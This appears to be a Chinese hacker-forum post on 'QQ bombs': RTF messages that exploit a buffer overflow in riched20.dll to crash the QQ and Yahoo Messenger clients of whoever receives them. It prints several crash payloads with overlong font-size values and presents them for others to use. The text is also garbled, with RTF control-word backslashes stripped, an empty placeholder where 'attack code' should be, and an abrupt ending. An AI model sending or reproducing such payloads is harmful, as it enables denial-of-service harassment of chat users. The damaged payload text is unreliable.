qq炸弹

QQ炸弹综述

近些日来 发现有更多的人问我QQ炸弹的事 在此 我搜集了所有的炸弹类型供大家研究

1．使用前提：对方使用的QQ必须是QQ2003III beta4版的，否则是无效的

攻击代码就在下面的括号中间，

()

2．漏洞描述：

riched20.dll中存在一个缓冲区溢出漏洞，该漏洞可导致使用此DLL模块相应功能的应用程序崩溃，但其很难被用来执行任意代码。

问题出现在其对RTF文档分析的代码中，其对文档中属性标示中的数字（如字体大小）等处理不当，使其出现溢出。

此溢出似乎不能导致执行任意代码。

下面一段RTF文档可能导致非法操作：

{

tf1ansiansicpg936deff0deflang1033deflangfe2052{fonttbl{f0fnilfprq2fcharset134 'cb'ce'cc'e5;}}

{colortbl ;

ed255green0lue255;}

viewkind4uc1pardcf1kerning2f0fs18121111111111111111111111111111111110000www.coyoc.comfs20par

}

其中 fs 是用来设置后面的文字 byebye 的字体大小的，当字体大小数字串长度超过32字节时，就会引发缓冲区溢出，当超过34字节以后就有可能会导致应用程序崩溃。

不但是fs的设置中会出现这个问题，其他属性标示中的类似情况下也会出现同样的问题，例如下面一段RTL文档，同样会导致非法操作：

{

tf1ansiansicpg936deff0deflang1033deflangfe2052{fonttbl{f0fnilfprq2fcharset134 'cb'ce'cc'e5;}}

{colortbl ;

ed255green0lue255;}

viewkind4uc1pardcf1kerning2f0121111111111111111111111111111111112222fs180www.coyoc.comfs20par

}

更为可怕的是，目前很多软件包括国内最流行的既时通讯软件QQ(QQ2000c 0825 版本以后)都会受此漏洞影响，对方可以给你发送一个包含利用漏洞的

攻击消息，那你的QQ在查看对方的消息时会立即崩溃。

经测试，对YHAOOMESSAGE同样有效。

3．提交格式的错误

{urtflansi街头黑客QQ炸弹{fonttblvhq{ffnil自然因子WWW.COYOC.COM;}}

4．本炸弹并非使用程序BUG